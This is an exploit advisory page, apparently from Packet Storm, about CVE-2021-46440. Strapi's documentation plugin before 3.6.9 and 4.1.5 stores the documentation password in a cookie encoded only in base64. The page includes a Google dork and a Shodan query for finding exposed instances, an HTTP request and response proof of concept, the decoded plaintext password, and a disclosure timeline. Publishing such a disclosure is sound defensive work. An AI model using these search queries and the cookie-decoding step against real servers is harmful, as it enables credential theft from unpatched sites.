what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Strapi 3.6.8 Password Disclosure / Insecure Handling

Strapi 3.6.8 Password Disclosure / Insecure Handling
Posted May 2, 2022
Authored by Kitchaphan Singchai

Strap versions prior to 3.6.9 and 4.1.5 disclose a user's password due to simply base64 encoding it and sticking it in a cookie.

tags | exploit
advisories | CVE-2021-46440
SHA-256 | 069e678d219ce2bfcd777e3fcf09ee5a7c59fe5b6c563e15e918fd0877c7aff7

Strapi 3.6.8 Password Disclosure / Insecure Handling

Change Mirror Download
# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format
# Google Dork: intitle:"Welcome to your Strapi ap"
# Shodan search: "X-Powered-By: Strapi <strapi.io>"
# Date: 2022-03-30
# Exploit Author: Kitchaphan Singchai [idealphase]
# Vendor Homepage: https://strapi.io/
# Software Link: https://github.com/strapi/strapi/releases
# Vulnerable Version: < 3.6.9 and < 4.1.5
# Version: 3.6.8
# Tested on: Linux
# CVE: CVE-2021-46440

# Description:
Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.

# This CVE has been fixed via this Github pull request.
- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)

# PoC:
[Request]
POST /documentation/login HTTP/1.1
Host: 127.0.0.1:1337
..[SNIP]..

password=password

[Response]
HTTP/1.1 302 Found
Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly
Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly
X-Powered-By: Strapi <strapi.io>
..[SNIP]..

Redirecting to <a href="/documentation">/documentation</a>.

Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.
{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}

# Timeline:
19/Jan/2022 - Inform vulnerability to Strapi team
20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.
8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)
28/Mar/2022 - Reserved CVE-2021-46440
29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close